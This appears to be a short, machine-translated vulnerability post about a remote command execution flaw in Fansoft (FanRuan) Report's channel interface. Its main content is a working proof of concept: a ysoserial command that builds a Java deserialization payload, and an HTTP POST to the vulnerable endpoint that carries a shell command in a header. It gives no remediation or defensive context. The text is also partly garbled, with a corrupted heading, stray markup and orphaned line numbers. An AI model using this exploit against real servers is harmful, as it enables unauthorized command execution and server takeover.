Fansoft Report Channel Remote Command Execution Vulnerability
Fansoft Report Channel Remote Command Execution Vulnerability
#现全文档文档档档档档 channel remote command execution vulnerability
Vulnerability Description
The channel interface has a remote command execution vulnerability. An attacker can obtain server permissions through the vulnerability and attack the server.
Vulnerability Impact
Fansoft Report</span>
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
8
9
java -jar ysuserial-1.5-su18-all.jar -g CommonsBeanutils1183NOCC -p 'EX-TomcatEcho' -ch "cmd" > fine10.bin
POST /webroot/decision/remote/design/channel HTTP/1.1
Content-Type: application/json
Host:
cmd: id
Connection: close
%7B%7Bgzip%28file%28fine10.bin%29%29%7D%7D
This post is licensed under CC BY 4.0 by the author.